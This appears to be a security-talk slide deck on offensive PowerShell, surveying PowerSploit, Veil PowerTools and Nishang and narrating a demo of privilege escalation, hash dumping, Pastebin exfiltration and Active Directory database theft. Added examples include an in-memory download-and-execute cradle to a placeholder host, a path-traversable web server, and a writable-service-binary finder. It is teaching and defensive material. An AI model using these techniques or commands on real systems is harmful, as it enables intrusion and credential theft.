jaredhaight
Hi, I’m Jared.
Sysadmin for 10 years
Likes to take pictures
Likes to break things
I write stuff occasionally here: https://words.photosandtext.com
I twitter stuff @jaredhaight
What is Powershell?
Powershell is an object oriented scripting language
Kind of a mix between C# and bash
It is the default method to manage a lot of Windows services now
Two components included:
Powershell.exe – The shell
Powershell_ise.exe – The IDE
How do I use it?
Variable assignment: $foo = 'bar'
For loops: ForEach ($obj in $list) {Write-Host $obj}
Logic: If ($obj -eq "cha-ha.com") {Write-Host "those guys are pretty cool"}
RTFM: Get-Help <command>
Get-Help <command> -Examples
Why do I want to know this crap?
Powershell is what admins are using to manage their boxes now (the good ones at least)
It actually is powerful:
Full access to .NET objects
Can interpret C# code
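An added example (written for this page, not taken from the slides or from any of the tools it covers) of the two points above: calling .NET types straight from the shell, and compiling inline C# with Add-Type, including a P/Invoke stub into kernel32. The class name Native and its members are made up for the illustration.

```powershell
# Added example: .NET objects and inline C# from Powershell.

# 1. .NET types are first-class. Who am I, and which token groups do I hold?
#    (This is the same question Loki asks later in the demo.)
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$id.Name
$id.Groups | ForEach-Object {
    $sid = $_
    # Some SIDs (e.g. logon SIDs) do not resolve to a name; fall back to the raw SID.
    try { $sid.Translate([Security.Principal.NTAccount]).Value } catch { $sid.Value }
}

# 2. Inline C#, compiled by Add-Type and then callable like any other type.
#    [DllImport] gives you Win32 APIs, which is how the tools later in this
#    deck reach into processes, LSASS, services, etc.
$src = @"
using System;
using System.Runtime.InteropServices;

public static class Native {          // hypothetical helper class for this example
    [DllImport("kernel32.dll")]
    public static extern uint GetCurrentProcessId();

    public static string Shout(string s) { return s.ToUpper() + "!"; }
}
"@
Add-Type -TypeDefinition $src

[Native]::Shout('powershell')               # POWERSHELL!
[Native]::GetCurrentProcessId() -eq $PID    # True: the P/Invoke call agrees with the shell's own $PID
```

One caveat that matters for the "in memory" theme of the rest of the deck: in Windows PowerShell, Add-Type hands the source to csc.exe and writes temporary .cs and .dll files under %TEMP% before loading the assembly, so it is not disk-free. PowerSploit's PSReflect module exists precisely to build P/Invoke stubs with Reflection.Emit instead, without touching the compiler.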
Quick and Dirty Powershell Web Server
# Courtesy of obscuresec (http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html)
# The "+" prefix binds every hostname: run from an elevated shell, or reserve
# the URL first with "netsh http add urlacl url=http://+:8000/ user=<account>".
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8000/")
$Hso.Start()
While ($Hso.IsListening) {
    $HC = $Hso.GetContext()
    $HRes = $HC.Response
    $HRes.Headers.Add("Content-Type","text/plain")
    # Serves whatever file the raw URL names, relative to the current directory.
    # No path validation at all: "dirty" means exactly that.
    $Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)))
    $HRes.ContentLength64 = $Buf.Length
    $HRes.OutputStream.Write($Buf,0,$Buf.Length)
    $HRes.Close()
}
$Hso.Stop()
What is being done with Powershell in Infosec?
Everything:
Recon
Backdoors
Shells
Exfiltration
Escalation
Incident Response
Forensics
Reverse Engineering
Big focus on “in memory” attacks. Payloads don’t touch the disk.
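The mechanism behind that claim, as an added example (not code from the slides or from any of the frameworks below): the "download cradle". A script is fetched as a string and evaluated in the running process, so no .ps1 is ever written to disk. The URL is a placeholder; point it at a script you host.

```powershell
# Added example: in-memory script loading. The URL is a placeholder.
$url = 'https://example.invalid/PowerView.ps1'

$wc = New-Object Net.WebClient
# Corporate proxies usually want the logged-on user's credentials; this
# reuses them without ever handling a password.
$wc.Proxy.Credentials = [Net.CredentialCache]::DefaultNetworkCredentials

# The script text exists only as a string in this process's memory.
# Once evaluated, its functions are available in the session.
Invoke-Expression $wc.DownloadString($url)

# The same thing as a one-line launcher, e.g. from a scheduled task or macro.
# -ExecutionPolicy governs script *files* only; it never applied to an
# evaluated string, so Bypass here only silences prompts for any file-based steps.
# powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass `
#   -Command "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/PowerView.ps1')"
```

"Doesn't touch disk" is a statement about file-based antivirus, not about visibility: PowerShell 5 and later can record the full text of every script block it runs (Script Block Logging, event ID 4104), cradle included, and that log is the first place a responder looks.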
Veil PowerTools
https://github.com/Veil-Framework/PowerTools
Part of the Veil Framework
Components:
PewPewPew – Run commands against a list of servers without touching the HDD
PowerBreach – Offers a variety of ways to trigger backdoor code
PowerPick – Allows the execution of PS code without powershell.exe
PowerUp – Assists with local escalation
PowerView – Network awareness tool
Cool stuff in Powertools
PowerView:
Invoke-SearchFiles – File search on local or remote hosts
Get-NetDomainControllers
Get-NetGroup – Gets members of a specified group
Get-NetLoggedon – Get users logged into a server
Invoke-StealthUserHunter – Finds the home directory server and checks it for active sessions from specific user accounts
Invoke-FindLocalAdminAccess – Finds machines that the current account has admin rights on
Get-ExploitableSystems – Cross references systems against common Metasploit exploit modules
Cool stuff in Powertools
PowerUp:
Get-ServiceEXEPerms – Finds services where the current user has write access to the exe
Invoke-ServiceUserAdd – Generates an exe that adds a given user to a local group and replaces a service exe with it
PowerBreach:
Invoke-DeadUserBackdoor – Triggers a payload if a given user account is deleted
Invoke-EventLogBackdoor – Triggers a payload if a specific user fails an RDP login
Cool stuff in Powertools
PewPewPew (my favorite name for anything ever):
Invoke-MassCommand – Runs a given command against a bunch of servers
Invoke-MassMimikatz – Runs mimikatz against all the things.
PowerSploit
https://github.com/mattifestation/PowerSploit
Modules:
AV Bypass
Code Execution
Exfiltration
Mayhem
Persistence
Recon
Script Modification – Modifies scripts to act as payloads (encoding, encryption)
Cool things in Powersploit
Exfiltration:
Invoke-NinjaCopy – Copies a file from NTFS by reading the raw volume and parsing the NTFS structures (so locked files like the SAM can be read)
Invoke-Mimikatz – Loads mimikatz into memory and runs it. Doesn't touch disk when run against a remote computer.
Get-Keystrokes – Keystroke logger
Get-GPPPassword – Browses Group Policy and finds passwords
Get-TimedScreenshot – Takes screenshots on an interval
Code Execution:
Invoke-Shellcode – Inject shellcode into a specified process
Cool things in Powersploit
Mayhem:
Set-MasterBootRecord – Writes a string to the MBR
Set-CriticalProcess – Marks the current process as critical, so exiting it BSODs the box
Nishang
https://github.com/samratashok/nishang
Modules (too many to list):
Backdoors
Escalation
Gather
Pivot
Scans
Shells
Client
Cool things about Nishang
Client:
Out-Word – Creates a Word file (or infects an existing one) with a macro that downloads and runs a Powershell script
Also see: Out-Excel, Out-HTA, Out-CHM, Out-Shortcut and Out-Java
Backdoors:
DNS_Txt_Pwnage – A backdoor that receives commands through DNS TXT queries
Gupt-Backdoor – A backdoor that receives commands from WLAN SSIDs (without connecting)
From the function's own help (.DESCRIPTION): Gupt looks for a specially crafted Wireless Network Name/SSID from the list of all available networks. It matches the first four characters of each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', the rest of the SSID name is considered to be a command and executed. If the 5th character is a 'u', the rest of the SSID is considered the id part of a Google URL Shortener link and a script is downloaded and executed in memory from the URL. See examples for usage.
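The SSID convention above, decoded in an added example that is written for this page and is not Nishang's code. It parses constructed "netsh wlan show networks" output and reports what Gupt would do, without running anything; the MagicString value 'hack' and the sample SSIDs are invented, and the match is assumed to be case-insensitive like Powershell's default -eq.

```powershell
# Added example: decode the Gupt-Backdoor SSID trigger (dry run, nothing executed).

function Get-GuptAction {
    param(
        [string[]]$NetshOutput,   # lines from: netsh wlan show networks
        [string]$MagicString      # four characters compared with the start of each SSID
    )
    # netsh prints one line per network of the form "    SSID 1 : <name>"
    $ssids = $NetshOutput | ForEach-Object {
        if ($_ -match '^\s*SSID\s+\d+\s*:\s*(.+?)\s*$') { $Matches[1] }
    }
    foreach ($ssid in $ssids) {
        if ($ssid.Length -lt 5) { continue }
        if ($ssid.Substring(0, 4) -ne $MagicString) { continue }   # -ne is case-insensitive
        $flag = $ssid.Substring(4, 1)
        $rest = $ssid.Substring(5)
        if ($flag -eq 'c') {
            # Gupt would hand $rest to the shell here
            return New-Object PSObject -Property @{ Type = 'Command'; Payload = $rest; SSID = $ssid }
        }
        if ($flag -eq 'u') {
            # Gupt would download http://goo.gl/<id> and IEX it here
            return New-Object PSObject -Property @{ Type = 'Url'; Payload = "http://goo.gl/$rest"; SSID = $ssid }
        }
        # magic prefix but unknown flag character: ignored, keep scanning
    }
    return $null
}

# Constructed scan output; only the third and fourth SSIDs carry a trigger.
$scan = @(
    '    SSID 1 : CoffeeShopGuest',
    '        Network type            : Infrastructure',
    '    SSID 2 : hackers-welcome',
    '    SSID 3 : hackcwhoami',
    '    SSID 4 : hacku1abcdE'
)
Get-GuptAction -NetshOutput $scan -MagicString 'hack'
# Returns the first hit only: Type=Command, Payload=whoami, SSID=hackcwhoami.
# "hackers-welcome" has the prefix but an unrecognised 5th character, so it is skipped.
```

Note what makes this channel awkward to spot from the network: the victim never associates with the rogue access point, it only reads beacon frames, so there is no client traffic to inspect; the artefact is the repeated netsh/WLAN scan on the host. The goo.gl shortener no longer creates new links, so the 'u' variant is of historical interest only.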
Cool things about Nishang
Gather:
Copy-VSS – Copy the SAM, SECURITY and AD database using Volume Shadow Copy
Get-PassHashes – Dumps local hashes
Invoke-MimikatzWdigestDowngrade – Sets the WDigest UseLogonCredential registry value to 1 so that plaintext passwords of subsequent logons can again be retrieved from LSASS memory (to bypass the protections introduced in Windows 8.1 and Server 2012 R2)
Shells:
Invoke-PSGcat – Executes commands stored in a Gmail account
Invoke-PowerShellTCP – Interactive bind or reverse shell
Utility:
Do-Exfiltration – Send data to Pastebin, Gmail, a web server or out as DNS TXT queries
The Situation
Loki is a disgruntled web developer
Thor also works here, but he’s not part of this demo
Also Tony Stark is the IT guy.
Getting local admin
Loki is an unprivileged user on his computer (He’s just in the “Domain Users” group)
Because Loki is a webdev, he has a local development environment installed on his machine.
This environment was installed with XAMPP, an easy to use package of PHP, MySQL and Apache.
In the following video, Loki finds that the Apache exe is writable. He then overwrites the Apache exe with an exe that creates a new local admin account.
Finally he restarts his computer to force the service to restart.
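The check that starts this chain, as an added example written for this page: a stand-alone equivalent of what PowerUp's Get-ServiceEXEPerms (from the PowerTools slides) looks for, not PowerUp's own code. It assumes local WMI access to Win32_Service; which services, binaries and ACLs it reports depends entirely on the host it runs on.

```powershell
# Added example: find services whose binary the current user can overwrite.

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Win32_Service.PathName is the full command line; pull out the executable.
    if ($PathName -match '^\s*"([^"]+)"')  { $exe = $Matches[1] }      # "C:\x\y.exe" args
    elseif ($PathName -match '^\s*(.+?\.exe)') { $exe = $Matches[1] }   # C:\x\y.exe args (unquoted)
    else { $exe = ($PathName -split ' ')[0] }
    return [Environment]::ExpandEnvironmentVariables($exe)
}

function Test-WritableByCurrentUser {
    param([string]$Path)
    # First try what PowerUp does: open the file for writing. A *running*
    # service keeps its exe locked, so a sharing violation (IOException) says
    # nothing about the ACL; in that case read the DACL instead.
    try {
        $fs = [IO.File]::Open($Path, [IO.FileMode]::Open, [IO.FileAccess]::Write, [IO.FileShare]::ReadWrite)
        $fs.Close()
        return $true
    } catch [System.UnauthorizedAccessException] {
        return $false
    } catch [System.IO.IOException] {
        # Allow ACEs only; Deny ACEs are not evaluated here, so treat a hit as
        # "worth confirming", not as proof.
        $me   = [Security.Principal.WindowsIdentity]::GetCurrent()
        $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
        foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if ($sids -notcontains $sid) { continue }
            # WriteData (0x2) is set by Write, Modify and FullControl alike.
            if (([int]$ace.FileSystemRights -band 2) -ne 0) { return $true }
        }
        return $false
    }
}

function Get-WritableServiceBinary {
    Get-WmiObject -Class Win32_Service | ForEach-Object {
        $exe = Get-ServiceBinaryPath $_.PathName
        if ($exe -and (Test-Path -LiteralPath $exe -ErrorAction SilentlyContinue) -and
            (Test-WritableByCurrentUser $exe)) {
            New-Object PSObject -Property @{
                Service   = $_.Name
                RunsAs    = $_.StartName   # LocalSystem: your exe runs as SYSTEM on next start
                StartMode = $_.StartMode   # Auto: a reboot restarts it, which is why Loki rebooted
                Path      = $exe
            }
        }
    }
}

Get-WritableServiceBinary | Format-Table Service, RunsAs, StartMode, Path -AutoSize
```

Installers that create their own directory outside Program Files and leave the default ACL on it, XAMPP's C:\xampp in the demo being a textbook case, are where these turn up. The same script, run as an audit from the least privileged account on a build, is the fix side of the slide: anything it lists needs its ACL tightened before a web developer finds it first.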
Dumping hashes, exfiltrating and escalating
Now that Loki has a local admin account ("mshackman") he can dump the hashes for the local computer
He then exfiltrates this data to Pastebin
Finally he disables the wdigest protections in Windows 8.1 in preparation for tricking IT into logging into his computer.
Dumping Active Directory
Loki convinced Tony Stark to log in to his computer and is now able to dump Stark's password using mimikatz
With Domain Admin credentials, Loki copies "Copy-VSS.ps1" to a Domain Controller and then dumps the Active Directory database (NTDS.dit) for offline analysis.
Who to watch
@harmj0y – Veil PowerTools
@sixdub – Veil Powertools
@mattifestation (Matt Graeber) – PowerSploit
@obscuresec – Misc. Awesomeness
@clymb3r – Misc. Awesomeness
@nikhil_mitt – Nishang
@jaredcatkinson – Invoke-IR